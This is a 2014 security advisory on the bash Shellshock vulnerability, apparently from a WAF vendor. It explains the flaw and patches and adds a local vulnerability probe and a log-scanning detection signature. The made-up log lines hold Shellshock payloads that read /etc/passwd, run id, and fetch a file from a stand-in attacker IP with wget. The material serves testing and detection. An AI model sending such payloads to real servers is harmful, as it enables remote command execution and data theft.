Thursday, September 25, 2014
Severity: The vulnerability carries the maximum CVSS base score of 10.0 (critical) with low access complexity: no authentication is required, and an attacker needs only to get a crafted string into an environment variable of a process that goes on to invoke bash.
Risk Assessment: The bash vulnerability is a critical threat to the web and can be used by an attacker to execute commands remotely in many common configurations. Its severity is heightened by the fact that bash is the default shell on most Linux servers, many UNIX systems and Mac OS X. An attacker can execute commands on affected servers, and even where the exploited service does not run as root, the resulting foothold is an important vector for further exploitation of the system.
While bash is not directly used by remote users, it is used internally by popular software packages such as web, mail and administration servers. In the case of a web server running CGI scripts, request headers such as User-Agent, Referer and Cookie are copied verbatim into environment variables before the script is executed; if that script is bash, or calls bash, a specially crafted header value causes bash to run the attacker's commands on the server. This is an extremely serious issue and should be dealt with urgently.
Vulnerability: A critical vulnerability (CVE-2014-6271, widely known as Shellshock) has been discovered in the Bourne-again shell (bash). It is present on Linux, UNIX and Mac OS X. Bash imports function definitions from environment variables whose values begin with "() {"; a vulnerable bash does not stop parsing at the end of the function body and executes any trailing commands appended to the definition. Because an environment variable with an arbitrary name can carry the malicious definition, any network-facing service that places attacker-controlled data into the environment and then invokes bash (directly, or through /bin/sh where that is bash) is exploitable remotely. Many software packages invoke bash indirectly in this way, so the flaw is expected to surface in a large amount of software. Routers, SCADA/ICS devices and medical equipment are also likely to be exposed.
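The following script is an added example and is not part of the original advisory or of Indusface's tooling. It reproduces the condition described above locally: one helper runs bash with a single extra environment variable, the way a CGI server exports request headers, and the payload is delivered once under an arbitrary name and once under HTTP_USER_AGENT. The variable names, the probe strings and the header value are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original advisory): reproduce the Shellshock
# condition locally. A vulnerable bash parses any environment variable whose
# value starts with "() {" as an exported function and, because of the bug,
# keeps executing whatever follows the closing brace while importing it.

# Run bash with one extra environment variable, the way a CGI server exports
# request headers (HTTP_USER_AGENT, HTTP_COOKIE, ...) before exec'ing a script.
# Usage: run_bash_with_env NAME VALUE
run_bash_with_env() {
    # stderr is discarded: partially patched builds emit "ignoring function
    # definition attempt" warnings that would clutter the comparison.
    env "$1=$2" bash -c 'echo handler-ran' 2>/dev/null
}

# Probe for the original bug (CVE-2014-6271). The variable name "x" is
# arbitrary, which is exactly why header-to-environment mappings are dangerous.
# Prints one of: bash-missing, vulnerable, patched.
check_shellshock() {
    if ! command -v bash >/dev/null 2>&1; then
        echo bash-missing
        return 0
    fi
    out=$(run_bash_with_env x '() { :;}; echo vulnerable')
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# Same payload delivered through the header name a CGI server would export.
# The User-Agent value is constructed for this example. On a vulnerable
# system the output contains INJECTED before handler-ran; on a patched
# system only handler-ran appears.
simulate_cgi_request() {
    run_bash_with_env HTTP_USER_AGENT '() { :;}; echo INJECTED'
}

echo "local bash: $(check_shellshock)"
echo "cgi simulation: $(simulate_cgi_request)"
```

The probe only covers the original bug; the first vendor patches were incomplete and follow-up fixes were issued, so a "patched" result here should be confirmed against the package version your distribution lists as fully fixed.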
Risk Mitigation: This vulnerability affects GNU Bash versions 1.14 through 4.3. The following major Linux distribution vendors have issued patches for the affected versions:
• Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
• CentOS (versions 5 through 7)
• Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
Fix: All users of the bash package should upgrade immediately using the patches their vendor has released. Note that the first round of patches was incomplete and was followed by further updates, so confirm that the installed bash is at the latest patch level your vendor provides, and re-test after updating. Because bash is started fresh for each invocation, no service restart is needed for the fix to take effect.
Indusface's core rule set provides extensive protection for the "command injection" category of vulnerabilities, and those core rules already protected users against most bash-centric attack payloads. We have added further signatures for various customer environments to ensure the highest level of customized protection for existing IndusGuard WAF customers.
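As an added illustration of what a command-injection signature for this attack looks like (this is example code written for this page, not Indusface's rule set), the script below greps constructed Apache combined-format log lines for the "() {" marker in both its raw and its common percent-encoded form. The log lines, client addresses (RFC 5737 documentation ranges) and payloads are all made up for the example.

```shell
#!/bin/sh
# Added example (not Indusface's rule set): a minimal signature for
# Shellshock attempts in Apache combined access logs. Real WAF rules decode
# and normalise every header and parameter first; this grep only covers the
# raw form and the common percent-encoded form of "() {".
SHELLSHOCK_SIG='\(\)[[:space:]]*\{|%28%29(%20|\+)*%7[bB]'

# Constructed sample log lines (RFC 5737 documentation addresses).
# Lines 1-3 are attack attempts (User-Agent, Referer, query string);
# lines 4-5 are benign, the last one containing "()" without a brace.
sample_log() {
cat <<'EOF'
203.0.113.7 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"cat /etc/passwd\""
203.0.113.7 - - [25/Sep/2014:10:12:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { ignored;}; /usr/bin/wget http://198.51.100.9/x" "Mozilla/5.0"
198.51.100.22 - - [25/Sep/2014:10:12:05 +0000] "GET /cgi-bin/status?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 200 512 "-" "curl/7.37"
192.0.2.15 - - [25/Sep/2014:10:12:07 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.16 - - [25/Sep/2014:10:12:09 +0000] "GET /docs/functions() HTTP/1.1" 404 200 "-" "Mozilla/5.0"
EOF
}

# Print the log lines that match the signature (reads stdin).
scan_log() {
    grep -E "$SHELLSHOCK_SIG"
}

# Number of matching lines in the constructed sample.
count_hits() {
    sample_log | grep -cE "$SHELLSHOCK_SIG"
}

# Distinct client addresses behind the matching lines, one per line, sorted.
offenders() {
    sample_log | scan_log | cut -d' ' -f1 | sort -u
}

echo "matching requests: $(count_hits)"
echo "offending clients:"
offenders
```

A signature like this is a stopgap, not a fix: payloads can be split across headers, double-encoded or placed in the request body, and a WAF only sees the traffic routed through it. Patch bash first and treat the signature as detection for attempts against hosts you have not yet updated.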